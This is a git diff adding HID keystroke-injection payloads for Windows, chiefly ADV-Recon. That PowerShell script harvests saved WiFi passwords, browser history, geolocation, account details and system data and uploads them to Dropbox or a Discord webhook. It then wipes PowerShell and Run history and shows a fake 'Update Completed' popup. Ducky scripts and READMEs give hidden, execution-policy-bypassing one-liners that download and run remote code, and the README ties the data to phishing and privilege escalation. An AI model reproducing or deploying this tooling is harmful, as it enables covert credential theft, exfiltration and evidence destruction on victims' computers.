diff --git a/Payloads/ADV-Recon/ADV-Recon.ps1 b/Payloads/ADV-Recon/ADV-Recon.ps1
new file mode 100644
index 0000000..4743950
--- /dev/null
+++ b/Payloads/ADV-Recon/ADV-Recon.ps1
@@ -0,0 +1,588 @@
+############################################################################################################################################################
+# | ___ _ _ _ # ,d88b.d88b #
+# Title : ADV-Recon | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
+# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
+# Version : 2.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
+# Category : Recon | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
+# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
+# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
+# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
+# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
+# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
+#__________________________________|_________________________________________________________________________# | | ) ~ ( #
+# tiktok.com/@i_am_jakoby # / \ / ~ \ #
+# github.com/I-Am-Jakoby # \ / \~ ~/ #
+# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
+# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
+# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
+############################################################################################################################################################
+
+<#
+.SYNOPSIS
+ This is an advanced recon of a target PC and exfiltration of that data.
+.DESCRIPTION
+ This program gathers details from target PC to include everything you could imagine from wifi passwords to PC specs to every process running.
+ All of the gather information is formatted neatly and output to a file.
+ That file is then exfiltrated to cloud storage via Dropbox.
+.Link
+ https://developers.dropbox.com/oauth-guide # Guide for setting up your Dropbox for uploads
+ https://www.youtube.com/watch?v=Zs-1j42ySNU # My youtube tutorial on Discord Uploads
+ https://www.youtube.com/watch?v=VPU7dFzpQrM # My youtube tutorial on Dropbox Uploads
+#>
+
+############################################################################################################################################################
+
+# MAKE LOOT FOLDER, FILE, and ZIP
+
+$FolderName = "$env:USERNAME-LOOT-$(get-date -f yyyy-MM-dd_hh-mm)"
+
+$FileName = "$FolderName.txt"
+
+$ZIP = "$FolderName.zip"
+
+New-Item -Path $env:tmp/$FolderName -ItemType Directory
+
+############################################################################################################################################################
+
+# Enter your access tokens below. At least one has to be provided but both can be used at the same time.
+
+#$db = ""
+
+#$dc = ""
+
+############################################################################################################################################################
+
+# Recon all User Directories
+tree $Env:userprofile /a /f >> $env:TEMP\$FolderName\tree.txt
+
+# Powershell history
+Copy-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Destination $env:TEMP\$FolderName\Powershell-History.txt
+
+############################################################################################################################################################
+
+function Get-fullName {
+
+ try {
+ $fullName = (Get-LocalUser -Name $env:USERNAME).FullName
+ }
+
+ # If no name is detected function will return $env:UserName
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No name was detected"
+ return $env:UserName
+ -ErrorAction SilentlyContinue
+ }
+
+ return $fullName
+
+}
+
+$fullName = Get-fullName
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+function Get-email {
+
+ try {
+
+ $email = (Get-CimInstance CIM_ComputerSystem).PrimaryOwnerName
+ return $email
+ }
+
+# If no email is detected function will return backup message for sapi speak
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "An email was not found"
+ return "No Email Detected"
+ -ErrorAction SilentlyContinue
+ }
+}
+
+$email = Get-email
+
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+function Get-GeoLocation{
+ try {
+ Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
+ $GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
+ $GeoWatcher.Start() #Begin resolving current locaton
+
+ while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
+ Start-Sleep -Milliseconds 100 #Wait for discovery.
+ }
+
+ if ($GeoWatcher.Permission -eq 'Denied'){
+ Write-Error 'Access Denied for Location Information'
+ } else {
+ $GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results.
+ }
+ }
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No coordinates found"
+ return "No Coordinates found"
+ -ErrorAction SilentlyContinue
+ }
+
+}
+
+$GeoLocation = Get-GeoLocation
+
+$GeoLocation = $GeoLocation -split " "
+
+$Lat = $GeoLocation[0].Substring(11) -replace ".$"
+
+$Lon = $GeoLocation[1].Substring(10) -replace ".$"
+
+############################################################################################################################################################
+
+# local-user
+
+$luser=Get-WmiObject -Class Win32_UserAccount | Format-Table Caption, Domain, Name, FullName, SID | Out-String
+
+############################################################################################################################################################
+
+Function Get-RegistryValue($key, $value) { (Get-ItemProperty $key $value).$value }
+
+$Key = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
+$ConsentPromptBehaviorAdmin_Name = "ConsentPromptBehaviorAdmin"
+$PromptOnSecureDesktop_Name = "PromptOnSecureDesktop"
+
+$ConsentPromptBehaviorAdmin_Value = Get-RegistryValue $Key $ConsentPromptBehaviorAdmin_Name
+$PromptOnSecureDesktop_Value = Get-RegistryValue $Key $PromptOnSecureDesktop_Name
+
+If($ConsentPromptBehaviorAdmin_Value -Eq 0 -And $PromptOnSecureDesktop_Value -Eq 0){ $UAC = "Never notIfy" }
+
+ElseIf($ConsentPromptBehaviorAdmin_Value -Eq 5 -And $PromptOnSecureDesktop_Value -Eq 0){ $UAC = "NotIfy me only when apps try to make changes to my computer(do not dim my desktop)" }
+
+ElseIf($ConsentPromptBehaviorAdmin_Value -Eq 5 -And $PromptOnSecureDesktop_Value -Eq 1){ $UAC = "NotIfy me only when apps try to make changes to my computer(default)" }
+
+ElseIf($ConsentPromptBehaviorAdmin_Value -Eq 2 -And $PromptOnSecureDesktop_Value -Eq 1){ $UAC = "Always notIfy" }
+
+Else{ $UAC = "Unknown" }
+
+############################################################################################################################################################
+
+$lsass = Get-Process -Name "lsass"
+
+if ($lsass.ProtectedProcess) {$lsass = "LSASS is running as a protected process."}
+
+else {$lsass = "LSASS is not running as a protected process."}
+
+############################################################################################################################################################
+
+$StartUp = (Get-ChildItem -Path ([Environment]::GetFolderPath("Startup"))).Name
+
+############################################################################################################################################################
+
+# Get nearby wifi networks
+
+try
+{
+$NearbyWifi = (netsh wlan show networks mode=Bssid | ?{$_ -like "SSID*" -or $_ -like "*Authentication*" -or $_ -like "*Encryption*"}).trim()
+}
+catch
+{
+$NearbyWifi="No nearby wifi networks detected"
+}
+
+############################################################################################################################################################
+
+# Get info about pc
+
+# Get IP / Network Info
+
+try{$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content}
+catch{$computerPubIP="Error getting Public IP"}
+
+try{$localIP = Get-NetIPAddress -InterfaceAlias "*Ethernet*","*Wi-Fi*" -AddressFamily IPv4 | Select InterfaceAlias, IPAddress, PrefixOrigin | Out-String}
+catch{$localIP = "Error getting local IP"}
+
+$MAC = Get-NetAdapter -Name "*Ethernet*","*Wi-Fi*"| Select Name, MacAddress, Status | Out-String
+
+# Check RDP
+
+if ((Get-ItemProperty "hklm:\System\CurrentControlSet\Control\Terminal Server").fDenyTSConnections -eq 0) {
+ $RDP = "RDP is Enabled"
+} else {
+ $RDP = "RDP is NOT enabled"
+}
+
+############################################################################################################################################################
+
+#Get System Info
+$computerSystem = Get-CimInstance CIM_ComputerSystem
+
+$computerName = $computerSystem.Name
+
+$computerModel = $computerSystem.Model
+
+$computerManufacturer = $computerSystem.Manufacturer
+
+$computerBIOS = Get-CimInstance CIM_BIOSElement | Out-String
+
+$computerOs=(Get-WMIObject win32_operatingsystem) | Select Caption, Version | Out-String
+
+$computerCpu=Get-WmiObject Win32_Processor | select DeviceID, Name, Caption, Manufacturer, MaxClockSpeed, L2CacheSize, L2CacheSpeed, L3CacheSize, L3CacheSpeed | Format-List | Out-String
+
+$computerMainboard=Get-WmiObject Win32_BaseBoard | Format-List | Out-String
+
+$computerRamCapacity=Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1} GB" -f ($_.sum / 1GB)} | Out-String
+
+$computerRam=Get-WmiObject Win32_PhysicalMemory | select DeviceLocator, @{Name="Capacity";Expression={ "{0:N1} GB" -f ($_.Capacity / 1GB)}}, ConfiguredClockSpeed, ConfiguredVoltage | Format-Table | Out-String
+
+############################################################################################################################################################
+
+$ScheduledTasks = Get-ScheduledTask
+
+############################################################################################################################################################
+
+$klist = klist sessions
+
+############################################################################################################################################################
+
+$RecentFiles = Get-ChildItem -Path $env:USERPROFILE -Recurse -File | Sort-Object LastWriteTime -Descending | Select-Object -First 50 FullName, LastWriteTime
+
+############################################################################################################################################################
+
+# Get HDDs
+$driveType = @{
+ 2="Removable disk "
+ 3="Fixed local disk "
+ 4="Network disk "
+ 5="Compact disk "}
+$Hdds = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, @{Name="DriveType";Expression={$driveType.item([int]$_.DriveType)}}, FileSystem,VolumeSerialNumber,@{Name="Size_GB";Expression={"{0:N1} GB" -f ($_.Size / 1Gb)}}, @{Name="FreeSpace_GB";Expression={"{0:N1} GB" -f ($_.FreeSpace / 1Gb)}}, @{Name="FreeSpace_percent";Expression={"{0:N1}%" -f ((100 / ($_.Size / $_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,DriveType,FileSystem,VolumeSerialNumber,@{ Name="Size GB"; Expression={$_.Size_GB}; align="right"; }, @{ Name="FreeSpace GB"; Expression={$_.FreeSpace_GB}; align="right"; }, @{ Name="FreeSpace %"; Expression={$_.FreeSpace_percent}; align="right"; } | Out-String
+
+#Get - Com & Serial Devices
+$COMDevices = Get-Wmiobject Win32_USBControllerDevice | ForEach-Object{[Wmi]($_.Dependent)} | Select-Object Name, DeviceID, Manufacturer | Sort-Object -Descending Name | Format-Table | Out-String -width 250
+
+############################################################################################################################################################
+
+# Get Network Interfaces
+$NetworkAdapters = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress | Out-String -width 250
+
+$wifiProfiles = (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | Out-String
+
+############################################################################################################################################################
+
+# process first
+$process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine | Sort-Object ProcessName | Format-Table Handle, ProcessName, ExecutablePath, CommandLine | Out-String -width 250
+
+# Get Listeners / ActiveTcpConnections
+$listener = Get-NetTCPConnection | select @{Name="LocalAddress";Expression={$_.LocalAddress + ":" + $_.LocalPort}}, @{Name="RemoteAddress";Expression={$_.RemoteAddress + ":" + $_.RemotePort}}, State, AppliedSetting, OwningProcess
+$listener = $listener | foreach-object {
+ $listenerItem = $_
+ $processItem = ($process | where { [int]$_.Handle -like [int]$listenerItem.OwningProcess })
+ new-object PSObject -property @{
+ "LocalAddress" = $listenerItem.LocalAddress
+ "RemoteAddress" = $listenerItem.RemoteAddress
+ "State" = $listenerItem.State
+ "AppliedSetting" = $listenerItem.AppliedSetting
+ "OwningProcess" = $listenerItem.OwningProcess
+ "ProcessName" = $processItem.ProcessName
+ }
+} | select LocalAddress, RemoteAddress, State, AppliedSetting, OwningProcess, ProcessName | Sort-Object LocalAddress | Format-Table | Out-String -width 250
+
+# service
+$service=Get-WmiObject win32_service | select State, Name, DisplayName, PathName, @{Name="Sort";Expression={$_.State + $_.Name}} | Sort-Object Sort | Format-Table State, Name, DisplayName, PathName | Out-String -width 250
+
+# installed software (get uninstaller)
+$software=Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { $_.DisplayName -notlike $null } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize | Out-String -width 250
+
+# drivers
+$drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion | Out-String -width 250
+
+# videocard
+$videocard=Get-WmiObject Win32_VideoController | Format-Table Name, VideoProcessor, DriverVersion, CurrentHorizontalResolution, CurrentVerticalResolution | Out-String -width 250
+
+
+############################################################################################################################################################
+
+# OUTPUTS RESULTS TO LOOT FILE
+
+$output = @"
+
+############################################################################################################################################################
+# | ___ _ _ _ # ,d88b.d88b #
+# Title : ADV-Recon | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
+# Author : I am Jakoby | | | / _' | | '_ ' _ \ _ | | / _' | | |/ / / _ \ | '_ \ | | | |# 'Y8888888Y' #
+# Version : 2.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# 'Y888Y' #
+# Category : Recon | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# 'Y' #
+# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
+# Mode : HID | |\__/,| ('\ # / -\ /- ~\ #
+# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
+# | and yea curiosity killed the cat ( T ) / # Luther )==*(' ') ~ \ Hobo #
+# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
+#__________________________________|_________________________________________________________________________# | | ) ~ ( #
+# tiktok.com/@i_am_jakoby # / \ / ~ \ #
+# github.com/I-Am-Jakoby # \ / \~ ~/ #
+# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
+# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
+# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
+############################################################################################################################################################
+
+
+Full Name: $fullName
+
+Email: $email
+
+GeoLocation:
+Latitude: $Lat
+Longitude: $Lon
+
+------------------------------------------------------------------------------------------------------------------------------
+
+Local Users:
+$luser
+
+------------------------------------------------------------------------------------------------------------------------------
+
+UAC State:
+$UAC
+
+LSASS State:
+$lsass
+
+RDP State:
+$RDP
+
+------------------------------------------------------------------------------------------------------------------------------
+
+Public IP:
+$computerPubIP
+
+Local IPs:
+$localIP
+
+MAC:
+$MAC
+
+------------------------------------------------------------------------------------------------------------------------------
+
+Computer Name:
+$computerName
+
+Model:
+$computerModel
+
+Manufacturer:
+$computerManufacturer
+
+BIOS:
+$computerBIOS
+
+OS:
+$computerOs
+
+CPU:
+$computerCpu
+
+Mainboard:
+$computerMainboard
+
+Ram Capacity:
+$computerRamCapacity
+
+Total installed Ram:
+$computerRam
+
+Video Card:
+$videocard
+
+------------------------------------------------------------------------------------------------------------------------------
+
+Contents of Start Up Folder:
+$StartUp
+
+------------------------------------------------------------------------------------------------------------------------------
+
+Scheduled Tasks:
+$ScheduledTasks
+
+------------------------------------------------------------------------------------------------------------------------------
+
+Logon Sessions:
+$klist
+
+------------------------------------------------------------------------------------------------------------------------------
+
+Recent Files:
+$RecentFiles
+
+------------------------------------------------------------------------------------------------------------------------------
+
+Hard-Drives:
+$Hdds
+
+COM Devices:
+$COMDevices
+
+------------------------------------------------------------------------------------------------------------------------------
+
+Network Adapters:
+$NetworkAdapters
+
+------------------------------------------------------------------------------------------------------------------------------
+
+Nearby Wifi:
+$NearbyWifi
+
+Wifi Profiles:
+$wifiProfiles
+
+------------------------------------------------------------------------------------------------------------------------------
+
+Process:
+$process
+
+------------------------------------------------------------------------------------------------------------------------------
+
+Listeners:
+$listener
+
+------------------------------------------------------------------------------------------------------------------------------
+
+Services:
+$service
+
+------------------------------------------------------------------------------------------------------------------------------
+
+Installed Software:
+$software
+
+------------------------------------------------------------------------------------------------------------------------------
+
+Drivers:
+$drivers
+
+------------------------------------------------------------------------------------------------------------------------------
+
+"@
+
+$output > $env:TEMP\$FolderName/computerData.txt
+
+############################################################################################################################################################
+
+function Get-BrowserData {
+
+ [CmdletBinding()]
+ param (
+ [Parameter (Position=1,Mandatory = $True)]
+ [string]$Browser,
+ [Parameter (Position=1,Mandatory = $True)]
+ [string]$DataType
+ )
+
+ $Regex = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
+
+ if ($Browser -eq 'chrome' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History"}
+ elseif ($Browser -eq 'chrome' -and $DataType -eq 'bookmarks' ) {$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Bookmarks"}
+ elseif ($Browser -eq 'edge' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Local\Microsoft/Edge/User Data/Default/History"}
+ elseif ($Browser -eq 'edge' -and $DataType -eq 'bookmarks' ) {$Path = "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks"}
+ elseif ($Browser -eq 'firefox' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default-release\places.sqlite"}
+
+
+ $Value = Get-Content -Path $Path | Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique
+ $Value | ForEach-Object {
+ $Key = $_
+ if ($Key -match $Search){
+ New-Object -TypeName PSObject -Property @{
+ User = $env:UserName
+ Browser = $Browser
+ DataType = $DataType
+ Data = $_
+ }
+ }
+ }
+}
+
+Get-BrowserData -Browser "edge" -DataType "history" >> $env:TMP\$FolderName\BrowserData.txt
+
+Get-BrowserData -Browser "edge" -DataType "bookmarks" >> $env:TMP\$FolderName\BrowserData.txt
+
+Get-BrowserData -Browser "chrome" -DataType "history" >> $env:TMP\$FolderName\BrowserData.txt
+
+Get-BrowserData -Browser "chrome" -DataType "bookmarks" >> $env:TMP\$FolderName\BrowserData.txt
+
+Get-BrowserData -Browser "firefox" -DataType "history" >> $env:TMP\$FolderName\BrowserData.txt
+
+############################################################################################################################################################
+
+Compress-Archive -Path $env:tmp/$FolderName -DestinationPath $env:tmp/$ZIP
+
+# Upload output file to dropbox
+
+function dropbox {
+$TargetFilePath="/$ZIP"
+$SourceFilePath="$env:TEMP\$ZIP"
+$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
+$authorization = "Bearer " + $db
+$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
+$headers.Add("Authorization", $authorization)
+$headers.Add("Dropbox-API-Arg", $arg)
+$headers.Add("Content-Type", 'application/octet-stream')
+Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
+}
+
+if (-not ([string]::IsNullOrEmpty($db))){dropbox}
+
+############################################################################################################################################################
+
+function Upload-Discord {
+
+[CmdletBinding()]
+param (
+ [parameter(Position=0,Mandatory=$False)]
+ [string]$file,
+ [parameter(Position=1,Mandatory=$False)]
+ [string]$text
+)
+
+$hookurl = "$dc"
+
+$Body = @{
+ 'username' = $env:username
+ 'content' = $text
+}
+
+if (-not ([string]::IsNullOrEmpty($text))){
+Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};
+
+if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
+}
+
+if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file "$env:tmp/$ZIP"}
+
+
+
+############################################################################################################################################################
+
+<#
+.NOTES
+ This is to clean up behind you and remove any evidence to prove you were there
+#>
+
+# Delete contents of Temp folder
+
+rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
+
+# Delete run box history
+
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+
+# Delete powershell history
+
+Remove-Item (Get-PSreadlineOption).HistorySavePath
+
+# Deletes contents of recycle bin
+
+Clear-RecycleBin -Force -ErrorAction SilentlyContinue
+
+
+############################################################################################################################################################
+
+# Popup message to signal the payload is done
+
+$done = New-Object -ComObject Wscript.Shell;$done.Popup("Update Completed",1)
diff --git a/Payloads/ADV-Recon/ADV-Recon.txt b/Payloads/ADV-Recon/ADV-Recon.txt
new file mode 100644
index 0000000..932c2f6
--- /dev/null
+++ b/Payloads/ADV-Recon/ADV-Recon.txt
@@ -0,0 +1,12 @@
+REM Title: ADV-Recon
+
+REM Author: I am Jakoby
+
+REM Description: This payload is meant to do an advanced recon of the target's PC. See README.md file for more details.
+
+REM Target: Windows 10, 11
+
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/9nb | iex
+ENTER
diff --git a/Payloads/ADV-Recon/README.md b/Payloads/ADV-Recon/README.md
new file mode 100644
index 0000000..46385f3
--- /dev/null
+++ b/Payloads/ADV-Recon/README.md
@@ -0,0 +1,145 @@
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# ADV-Recon
+
+A script used to do an advanced level of recon on the target's computer.
+
+Version 2 no longer requires you to host your own version of the script.
+
+Modifying the execution script is the only necessary interaction.
+
+## Description
+
+This program enumerates a target PC to collect as much recon data as possible for future engagements. This includes:
+
+* Hosts PowerShell Version (to know what commands can be run)
+* Name associated with their Microsoft account (Or ENV UserName variable if one is not detected)
+* Whether they are in the Admin group or not
+* The email associated with their Microsoft account (for phishing possibilities)
+* Other User accounts on their system (for possible privilege escalation)
+* Details on their login settings (Ex: Min/Max password age and length)
+* How many days since they have changed their password (Max password age - Days since = Opportunity)
+* Their GeoLocation (know their approximate where abouts)
+* Nearby Wifi Networks (Possible lateral movement)
+* Network Info (Local and Public IP Address; MAC Address; RDP Enabled?)
+* WLAN Profiles (List of SSIDs and Passwords stored on their PC)
+* Network Interfaces (What are they connecting in and out with)
+* System Information (Manufacturer, Model, Serial Number, OS, CPU, RAM, Mainboard BIOS)
+* Local Users (Accounts on system with Username, name associated with microsoft account and SID)
+* Information on their hard drives (Indicator of Recon Scope)
+* COM and Serial Devices (Is there a device connected you can manipulate?)
+* Active TCP Connections (Poor mans Port Scanning)
+* Processes, Services, Software, and Drivers (What is running on the computer we can exploit?)
+* Video Card info (how much vroom vroom?)
+* Tree Command (Gain a more accurate assessment of what to exfil or use in Phishing attacks)
+
+## Getting Started
+
+### Dependencies
+
+* Dropbox or Discord
+* Windows 10,11
+
+(back to top)
+
+### Executing program
+
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
+
+`$dc` is the variable that stores your discord webhook
+
+`$db` is the variable that stores your dropbox token
+
+Fill in either or both of these two methods to exfil your collected data
+
+```
+powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/9nb | iex
+```
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+* 0.2
+ * Added additional data queries
+ * Optimized output of data
+
+(back to top)
+
+
+## Contact
+
+π± My Socials π±
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+(back to top)
diff --git a/Payloads/ADV-RickRoll/ADV-RickRoll.txt b/Payloads/ADV-RickRoll/ADV-RickRoll.txt
new file mode 100644
index 0000000..c0f5497
--- /dev/null
+++ b/Payloads/ADV-RickRoll/ADV-RickRoll.txt
@@ -0,0 +1,18 @@
+REM Title: ADV-RickRoll
+
+REM Author: I am Jakoby
+
+REM Description: This is a one liner payload that will Rick Roll your target. Video will be played at full screen and max volume.
+REM Upon deployment, payload will pause until a mouse movement is detected and run once one is.
+
+REM Target: Windows 10, 11
+
+REM --------------------------------------------------------------------------------------
+REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
+REM --------------------------------------------------------------------------------------
+
+DELAY 2000
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";irm -Uri 'https://jakoby.lol/qee' -O "$D\rr.zip";Expand-Archive "$D\rr.zip" -Des $D\rr -Force;. "$D\rr\rr.ps1"
+ENTER
diff --git a/Payloads/ADV-RickRoll/ReadMe.md b/Payloads/ADV-RickRoll/ReadMe.md
new file mode 100644
index 0000000..9addab7
--- /dev/null
+++ b/Payloads/ADV-RickRoll/ReadMe.md
@@ -0,0 +1,120 @@
+
+
+
+
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# ADV-RickRoll
+
+A script used to do an advanced rick roll on your target.
+
+## Description
+
+This program Rick Rolls your target without opening a muted youtube video.
+A Rick Roll video is downloaded and played in your powershell console when a mouse movement is detected.
+
+## Getting Started
+
+### Dependencies
+
+* An internet connection
+* Windows 10,11
+
+(back to top)
+
+### Executing program
+
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload
+```
+powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";irm -Uri 'https://jakoby.lol/qee' -O "$D\rr.zip";Expand-Archive "$D\rr.zip" -Des $D\rr -Force;. "$D\rr\rr.ps1"
+```
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+π± My Socials π±
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+(back to top)
+
+
+ 
+
diff --git a/Payloads/AcidBurn/AcidBurn.ps1 b/Payloads/AcidBurn/AcidBurn.ps1
new file mode 100644
index 0000000..e845748
--- /dev/null
+++ b/Payloads/AcidBurn/AcidBurn.ps1
@@ -0,0 +1,704 @@
+############################################################################################################################################################
+# | ___ _ _ _ # ,d88b.d88b #
+# Title : AcidBurn | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
+# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
+# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
+# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
+# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
+# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
+# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
+# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
+# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
+#__________________________________|_________________________________________________________________________# | | ) ~ ( #
+# tiktok.com/@i_am_jakoby # / \ / ~ \ #
+# github.com/I-Am-Jakoby # \ / \~ ~/ #
+# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
+# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
+# youtube.com/c/IamJakoby (youtube link with demonstration coming soon) # | | | |( ( | | | \\ | | | | | |#
+############################################################################################################################################################
+
+<#
+.NOTES
+ This script was not optimized to shorten the code. This script is intended to have as much readability as possible for new coders to learn.
+
+.DESCRIPTION
+ This program gathers details from target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account.
+ The SSID and WiFi password of any current or previously connected to networks.
+ It determines the last day they changed their password and how many days ago.
+ Once the information is gathered the script will pause until a mouse movement is detected
+ Then the script uses Sapi speak to roast their set up and lack of security
+#>
+############################################################################################################################################################
+
+# Variables
+
+
+$s=New-Object -ComObject SAPI.SpVoice
+
+############################################################################################################################################################
+
+# Intro ---------------------------------------------------------------------------------------------------
+ function Get-fullName {
+
+ try {
+
+ $fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
+
+ }
+
+ # If no name is detected function will return $env:UserName
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No name was detected"
+ return $env:UserName
+ -ErrorAction SilentlyContinue
+ }
+
+ return $fullName
+
+}
+
+$fullName = Get-fullName
+
+# echo statement used to track progress while debugging
+echo "Intro Done"
+
+###########################################################################################################
+
+<#
+
+.NOTES
+ RAM Info
+ This will get the amount of RAM the target computer has
+#>
+
+
+function Get-RAM {
+
+ try {
+
+ $OS = (Get-WmiObject Win32_OperatingSystem).Name;$OSpos = $OS.IndexOf("|");$OS = $OS.Substring(0, $OSpos)
+
+ $RAM=Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1}" -f ($_.sum / 1GB)}
+ $RAMpos = $RAM.IndexOf('.')
+ $RAM = [int]$RAM.Substring(0,$RAMpos).Trim()
+
+# ENTER YOUR CUSTOM RESPONSES HERE
+#----------------------------------------------------------------------------------------------------
+ $lowRAM = "$RAM gigs of ram? might as well use pen and paper"
+
+ $okRAM = "$RAM gigs of ram really? I have a calculator with more computing power"
+
